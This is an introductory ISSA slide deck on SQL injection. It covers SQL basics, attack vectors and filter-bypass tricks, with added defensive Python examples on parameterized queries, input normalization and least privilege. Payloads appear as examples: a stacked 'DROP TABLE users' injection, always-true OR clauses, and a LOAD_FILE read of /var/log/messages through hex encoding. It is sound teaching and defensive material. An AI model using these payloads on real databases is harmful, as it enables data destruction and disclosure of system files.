SQL Injections ISSA


7/28/2019 SQL Injections ISSA

6/21/2013 SQL Injections Intro. Greg Bugaj, SCJP

ISSADC 405


Agenda

Disclaimer

What are SQL Injections

Intro to SQL

Attack Vectors

Bypassing filters Demos

Countermeasures

Questions


    Disclaimer

All code shown today is for educational and research purposes only.

In many countries it is illegal to use this type of attack.

Owners of the demonstrated websites have been notified of the problem.


Basic SQL

Select

Insert

Update

Delete

Union

SQL statement breakdown


    SQL - Select

    1. Select Information from a table

    SELECT * FROM table where field=1


    SQL - Insert

    1. Add new records to database

INSERT INTO tablename (id, name) VALUES (10, 'Greg')


    SQL - Update

    1. Updating existing records

    UPDATE table set fieldA=123 WHERE somefield=2323

UPDATE table set fieldB='Greg'


    SQL - Delete

    1. Delete records

    DELETE FROM tableA where somefield=1221

    DELETE FROM tableA


Terminators

; Semicolon ends the current SQL query and starts a new one (stacked query)

SELECT * FROM users ; DROP TABLE users

-- Double dash ignores the remaining query string

Select * FROM users --limit 10

Can be used in conjunction:

SELECT * FROM users WHERE id=''; DROP TABLE users; -- ' AND password=''


Where Clause Pruning

Powerful SQL technique

SQL trick for allowing a query to return either a full set or a specified subset

1=1 == TRUE

SELECT * FROM users WHERE (id = :id) OR (-1 = :id)
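The pruning query above is only safe when `:id` is a bound parameter and the web parameter has been validated as an integer first. The following is an added example (not code from the slides) that runs the same query against a constructed in-memory SQLite table; `SAMPLE_USERS`, `parse_id` and `fetch_users` are names chosen here. Note that SQLite compares the bound value as-is, so a string such as "-1 OR 1=1" would simply match nothing; `parse_id` rejects it before it ever reaches the database.

```python
import sqlite3

# Constructed sample rows for the demo (not from the slides).
SAMPLE_USERS = [(1, "alice"), (2, "bob"), (3, "carol")]

# The slide's pruning query; sqlite3 accepts :name placeholders bound from a dict.
PRUNING_QUERY = (
    "SELECT id, name FROM users WHERE (id = :id) OR (-1 = :id) ORDER BY id"
)


def make_db() -> sqlite3.Connection:
    """Create an in-memory database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (id, name) VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def parse_id(raw: str) -> int:
    """Whitelist validation for the id parameter as it arrives from the URL:
    it must be an integer. Anything else (e.g. "-1 OR 1=1") is rejected
    before any SQL is built, so no injected text can reach the query."""
    try:
        return int(raw.strip())
    except ValueError:
        raise ValueError(f"id must be an integer, got {raw!r}") from None


def fetch_users(conn: sqlite3.Connection, wanted_id: int) -> list:
    """Return the one matching user, or every user when the sentinel -1 is passed.

    The value is bound as a parameter, never concatenated into the SQL text,
    so the sentinel trick cannot be turned into an injection by the caller."""
    return conn.execute(PRUNING_QUERY, {"id": wanted_id}).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(fetch_users(db, parse_id("2")))    # only bob
    print(fetch_users(db, parse_id("-1")))   # the full set
    try:
        parse_id("-1 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```

The sentinel value is the application's own convention, so it has to be bound as a number; if the parameter were spliced into the query string, the same "return everything" effect could be triggered by input rather than by the code.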


    SQL Injection Cause

    Executed via front end of the Web Application

    GET URL parameter

    http://host.com/item.php?cat=1&id=11

    Form POST fields


    Techniques

    Normal SQL Injections

    Errors & Exception

    Unexpected output

    O'Reilly != O\'Reilly

    Blind SQL Injections

    No errors

    A lot of guesswork

    Introduction of a delay as part of a malicious SQL statement


    SQL Injection Types

    Passive

    Exposing database information

    Information retrieval

    Active

    Altering database information

    Insertion

    Deletion


    Testing for Vulnerability

    Manual

    Time consuming

Automated SQL injection scanners only scan for known vulnerabilities

    Google

    Incorrect syntax near


    Toolbox

    SQLIer

    SQLbftools

    SQLibf

    SQLBrute

    BobCat

    SQLMap

    Absinthe

    SQL Injection Pen-testing Tool

    SQID

SQLNinja

FJ-Injector Framework

    Automagic SQL Injector

    NGSS SQL Injector


Identifying Vulnerable Site

Given unexpected input, the site behaves oddly

Single Quote

Double Quote

1 Single Quote (one)

a Single Quote (a)

; Single Quote (semicolon)

Input > Satans little minion

Nothing found for Satan\s little minion

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'


Bypassing Filters

Escaping entities

%26%23039 == &#039 == ' (single quote)

%26 == &

%23 == #

039 Entity number

Select * FROM users WHERE username=secret%26%23039 OR%26%23039X%26%23039=%26%23039X

Evaluated as: Select * FROM users WHERE username=secret OR X = X

This evaluates to always true

Char function

Char(83,101,108,101,99,116,32,42,32,102,114,111,109,32,117,115,101,114,115)

== Select * from users

Concat & Hex functions

CONCAT('0x', HEX('/var/log/messages'))

== 0x2F7661722F6C6F672F6D65737361676573


Bypassing Filters

Injecting AND 1=(SELECT LOAD_FILE('var/log/messages') )

MySQL Error '\'var/log/messages\') ) limit 5 = 1 order by average desc limit 10' at line 1)


Bypassing Filters

1=(SELECT LOAD_FILE('var/log/messages') )

MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'var/log/messages\') ) limit 5 -- = 1 order by average desc limit 10' at line 1)

Char / Hex (the single quotes are escaped, so the path is supplied as a hex literal instead)

1=(SELECT LOAD_FILE(0x2F7661722F6C6F672F6D65737361676573))


Bypassing Blacklists

What are blacklists?

Blacklist (DELETE, EXEC)

DEL/**/ETE

/**/ D/**EVIL**/ELE/**/TE


Escape Characters

%26%23039 OR %26%23039X%26%23039=%26%23039X

Evaluated as: OR X = X
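The blacklist and escape-character slides above make one point for anyone writing an input filter: the filter sees the encoded form, the database sees the decoded form. The following is an added example (not code from the slides) of the defender-side fix for that gap, canonicalising the input (percent-decoding, HTML entity decoding and comment stripping, repeated until the text stops changing) before the blacklist is consulted. It uses the slide's own inputs (`DEL/**/ETE`, `/**/ D/**EVIL**/ELE/**/TE`, `%26%23039`) and goes slightly beyond them by also undoing double percent-encoding such as `%2527`; `normalize`, `blacklist_hits` and `BLACKLIST` are names chosen here.

```python
import html
import re
from urllib.parse import unquote

# The blacklist from the slide; constructed here as a frozenset of keywords.
BLACKLIST = frozenset({"DELETE", "EXEC"})

# Matches SQL block comments, including ones used to split a keyword in two.
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
WORD_RE = re.compile(r"[A-Za-z_]+")


def normalize(raw: str, max_rounds: int = 5) -> str:
    """Canonicalise untrusted input the way the backend will eventually see it.

    Each round percent-decodes, decodes HTML entities (e.g. &#039 -> ') and
    removes block comments. Rounds repeat until nothing changes, so that
    double-encoded input (%2527 -> %27 -> ') is fully unwrapped too."""
    text = raw
    for _ in range(max_rounds):
        step = unquote(text)
        step = html.unescape(step)
        step = COMMENT_RE.sub("", step)
        if step == text:
            break
        text = step
    return text.strip()


def blacklist_hits(raw: str, blacklist=BLACKLIST, normalize_first: bool = True) -> set:
    """Return the blacklisted keywords found in the input.

    With normalize_first=False this behaves like the naive filter the slide
    defeats: it matches on the raw text, so DEL/**/ETE yields no hit."""
    text = normalize(raw) if normalize_first else raw
    tokens = {w.upper() for w in WORD_RE.findall(text)}
    return tokens & set(blacklist)


if __name__ == "__main__":
    for sample in ("DEL/**/ETE", "/**/ D/**EVIL**/ELE/**/TE",
                   "secret%26%23039 OR%26%23039X%26%23039=%26%23039X"):
        print(repr(sample), "->", repr(normalize(sample)),
              "naive:", blacklist_hits(sample, normalize_first=False),
              "normalized:", blacklist_hits(sample))
```

Canonicalising before matching closes the specific bypasses shown on these slides, but it does not turn a blacklist into a reliable control: keyword lists are always incomplete, which is why the countermeasures slides put parameterised queries first and treat input filtering as defence in depth.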


    Demos

    Prerecorded demos


Countermeasures

System Administrators

Whitelist / blacklist input validation

Least privileges

Application firewalls

Developer

Stored procedures

Parameterized queries

Exception handling
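The developer countermeasure that removes the root cause is the parameterized query, and the contrast with string concatenation is easiest to see side by side. The following is an added example (not code from the slides) that builds the users lookup both ways over a constructed in-memory SQLite table and feeds each the inputs from the earlier slides: the `secret' OR 'X'='X` username and the `'; DROP TABLE users; -- ` terminator payload. `SAMPLE_ACCOUNTS`, `find_user_vulnerable`, `find_user_parameterized` and `table_exists` are names chosen here.

```python
import sqlite3

# Constructed sample accounts for the demo (not from the slides).
SAMPLE_ACCOUNTS = [("admin", "hash-of-admin-pw"), ("greg", "hash-of-greg-pw")]

# Inputs taken from the slides: the entity-escaping case decoded, and the stacked-query terminator.
PAYLOAD_OR = "secret' OR 'X'='X"
PAYLOAD_STACKED = "'; DROP TABLE users; -- "


def make_db() -> sqlite3.Connection:
    """Create an in-memory database with the constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_ACCOUNTS)
    conn.commit()
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """The bug: the input is spliced into the SQL text, so a quote in the input
    closes the literal and the rest becomes SQL (username=secret OR X = X)."""
    sql = f"SELECT username FROM users WHERE username='{username}' ORDER BY username"
    return conn.execute(sql).fetchall()


def find_user_parameterized(conn: sqlite3.Connection, username: str) -> list:
    """The fix: the SQL text is constant and the value is sent separately as a
    bound parameter, so quotes, semicolons and -- are just characters to compare."""
    sql = "SELECT username FROM users WHERE username=? ORDER BY username"
    return conn.execute(sql, (username,)).fetchall()


def table_exists(conn: sqlite3.Connection, name: str) -> bool:
    """Check the schema catalogue so the demo can show the table survived."""
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input:   ", find_user_vulnerable(db, "greg"))
    print("vulnerable, OR payload:     ", find_user_vulnerable(db, PAYLOAD_OR))
    print("parameterized, OR payload:  ", find_user_parameterized(db, PAYLOAD_OR))
    print("parameterized, stacked:     ", find_user_parameterized(db, PAYLOAD_STACKED))
    print("users table still present:  ", table_exists(db, "users"))
```

With the bound parameter the OR payload is compared literally against the username column and matches nothing, and the terminator payload never becomes a second statement, so the table is untouched. Stored procedures give the same protection only when they bind their arguments the same way; a procedure that builds dynamic SQL from its inputs inherits the concatenation bug.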


    Least Privileges

    Enforce least privileges

    CREATE / DELETE

    Does not guarantee security

    Access to portion of data

    Create views
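The least-privilege slide says the application's database account should not be able to CREATE or DELETE, and should see only a portion of the data through views. The following is an added example (not code from the slides) of that arrangement on SQLite, which has no GRANT statement, so the read-only application role is approximated by opening the file with `mode=ro`; `provision`, `open_app_connection`, `write_is_refused` and `demo` are names chosen here, and the rows are constructed.

```python
import os
import sqlite3
import tempfile

# Constructed sample rows; the password hash column is what the view must hide.
SAMPLE_USERS = [(1, "alice", "hash-a"), (2, "bob", "hash-b")]


def provision(path: str) -> None:
    """Administrator step: create the base table and a view exposing only the
    columns the application needs (id and username, no password hash)."""
    admin = sqlite3.connect(path)
    admin.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)"
    )
    admin.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    admin.execute("CREATE VIEW public_users AS SELECT id, username FROM users")
    admin.commit()
    admin.close()


def open_app_connection(path: str) -> sqlite3.Connection:
    """Application connection opened read-only: SQLite's stand-in for a database
    role that has SELECT only and no CREATE/DELETE/DROP rights."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def list_public_users(conn: sqlite3.Connection) -> list:
    """The only query the application needs, run against the view."""
    return conn.execute("SELECT id, username FROM public_users ORDER BY id").fetchall()


def write_is_refused(conn: sqlite3.Connection, sql: str) -> bool:
    """Attempt a write (what an injected DELETE or DROP would try) and report
    whether the engine refused it; on a read-only connection it does."""
    try:
        conn.execute(sql)
        conn.commit()
        return False
    except sqlite3.OperationalError:
        return True


def demo() -> dict:
    """Provision a temporary database and exercise the restricted connection."""
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    try:
        provision(path)
        app = open_app_connection(path)
        result = {
            "public_rows": list_public_users(app),
            "view_columns": [d[0] for d in app.execute("SELECT * FROM public_users").description],
            "delete_refused": write_is_refused(app, "DELETE FROM users"),
            "drop_refused": write_is_refused(app, "DROP TABLE users"),
        }
        app.close()
        return result
    finally:
        if os.path.exists(path):
            os.unlink(path)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

This is where the slide's "does not guarantee security" caveat applies: a read-only account still reads whatever it can see, and SQLite cannot revoke SELECT on the base table, so on a real DBMS the application role would be granted SELECT on the view only. Least privilege limits the damage of an injection; it does not remove the injection, which is still the developer's parameterized-query job.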


Application Firewalls

Software

Easy to install and maintain

Hardware

Expensive

Plug and play

Examples:

dotDefender

webApp.SECURE

SonicWALL

WatchGuard


References

http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors#Passive_SQL_Injection_.28SQP.29

http://upload.wikimedia.org/wikipedia/en/a/aa/SQL_ANATOMY_wiki.svg

http://www.cisco.com/web/about/security/intelligence/sql_injection.html